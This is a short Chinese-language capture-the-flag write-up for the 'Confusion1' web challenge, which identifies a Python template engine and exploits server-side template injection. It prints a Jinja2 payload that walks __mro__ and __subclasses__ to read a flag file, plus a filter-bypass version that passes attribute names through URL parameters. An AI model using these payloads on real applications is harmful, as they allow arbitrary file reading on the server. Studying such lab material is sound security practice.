WEB:Confusion1

背景知识

SSTI漏洞

题目

根据网站图片和题目描述的提示,大象是php,蟒蛇是python,说明了这个网站是用python写的

在python中,比较常规的漏洞就是SSTI模板注入

没有思路,先点login和register页面看看

查看源代码

之前猜测是ssti漏洞,先验证

ssti常用注入

复制代码
__class__() 返回对象的类
__base__()/__mro__() 返回类所继承的基类
__subclasses__() 返回继承类的所有子类

测试payload

复制代码
{{"".__class__.__mro__[2].__subclasses__()[40]("/opt/flag_1de36dff62a3a54ecfbc6e1fd2ef0ad1.txt").read()}}

被过滤了

替换payload为

复制代码
{{''[request.args.a][request.args.b][2][request.args.c]()[40]('/opt/flag_1de36dff62a3a54ecfbc6e1fd2ef0ad1.txt')[request.args.d]()}}?&a=__class__&b=__mro__&c=__subclasses__&d=read

得到flag

参考学习链接:
【愚公系列】2023年05月 攻防世界-Web(Confusion1)_confusion1攻防世界_愚公搬代码的博客-CSDN博客 【攻防世界WEB】难度四星12分进阶题:Confusion1_wx617e2c956ef44的技术博客_51CTO博客

相关推荐
bluechips·zhao2 小时前
帝国CMS 8.0 安全审计分析——代码审计
安全·网络安全·代码审计
whuhewei3 小时前
为什么客户端不存在跨域问题
前端·安全
Flittly3 小时前
【SpringSecurity新手村系列】(4)验证码功能实现
java·spring boot·安全·spring
Flittly3 小时前
【SpringSecurity新手村系列】(3)自定义登录页与表单认证
java·笔记·安全·spring·springboot
TechWayfarer3 小时前
攻防对抗:利用IP段归属查询工具快速封禁攻击源——3步联动防火墙(附脚本)
python·网络协议·tcp/ip·安全
常宇杏起5 小时前
AI安全进阶:AI模型鲁棒性测试的核心方法
大数据·人工智能·安全
木泽八5 小时前
2026年网络安全威胁全景:AI攻防新纪元完全指南
人工智能·安全·web安全
星幻元宇VR6 小时前
VR互动平台|开启沉浸式体验新方式
科技·学习·安全·vr·虚拟现实
云空6 小时前
《Hermes Agent 部署与使用中的安全漏洞分析及解决办法》
网络·人工智能·安全
常宇杏起7 小时前
AI安全进阶:AI模型投毒攻击的检测与防御
大数据·人工智能·安全